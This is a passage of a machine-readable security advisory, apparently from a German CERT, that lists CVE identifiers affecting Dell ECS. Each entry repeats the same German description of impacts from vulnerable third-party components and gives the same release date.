"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41974"
},
{
"cve": "CVE-2022-42003",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42003"
},
{
"cve": "CVE-2022-42004",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42004"
},
{
"cve": "CVE-2022-42010",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42010"
},
{
"cve": "CVE-2022-42011",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42011"
},
{
"cve": "CVE-2022-42012",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42012"
},
{
"cve": "CVE-2022-42328",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42328"
},
{
"cve": "CVE-2022-42329",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42329"
},
{
"cve": "CVE-2022-42703",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42703"
},
{
"cve": "CVE-2022-42889",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42889"
},
{
"cve": "CVE-2022-42895",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42895"
},
{
"cve": "CVE-2022-42896",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42896"
},
{
"cve": "CVE-2022-42898",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42898"
},
{
"cve": "CVE-2022-4292",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4292"
},
{
"cve": "CVE-2022-4293",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4293"
},
{
"cve": "CVE-2022-42969",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-42969"
},
{
"cve": "CVE-2022-4304",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4304"
},
{
"cve": "CVE-2022-43552",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-43552"
},
{
"cve": "CVE-2022-43680",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-43680"
},
{
"cve": "CVE-2022-43750",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-43750"
},
{
"cve": "CVE-2022-4378",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4378"
},
{
"cve": "CVE-2022-43945",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-43945"
},
{
"cve": "CVE-2022-43995",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-43995"
},
{
"cve": "CVE-2022-4415",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4415"
},
{
"cve": "CVE-2022-4450",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4450"
},
{
"cve": "CVE-2022-44638",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-44638"
},
{
"cve": "CVE-2022-45061",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45061"
},
{
"cve": "CVE-2022-45688",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45688"
},
{
"cve": "CVE-2022-45884",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45884"
},
{
"cve": "CVE-2022-45885",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45885"
},
{
"cve": "CVE-2022-45886",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45886"
},
{
"cve": "CVE-2022-45887",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45887"
},
{
"cve": "CVE-2022-45919",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45919"
},
{
"cve": "CVE-2022-45934",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45934"
},
{
"cve": "CVE-2022-45939",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-45939"
},
{
"cve": "CVE-2022-4662",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4662"
},
{
"cve": "CVE-2022-46751",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-46751"
},
{
"cve": "CVE-2022-46908",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-46908"
},
{
"cve": "CVE-2022-47629",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-47629"
},
{
"cve": "CVE-2022-47929",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-47929"
},
{
"cve": "CVE-2022-48281",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-48281"
},
{
"cve": "CVE-2022-48337",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-48337"
},
{
"cve": "CVE-2022-48339",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-48339"
},
{
"cve": "CVE-2023-0045",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0045"
},
{
"cve": "CVE-2023-0049",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0049"
},
{
"cve": "CVE-2023-0051",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0051"
},
{
"cve": "CVE-2023-0054",
"notes": [
{
"category": "description",
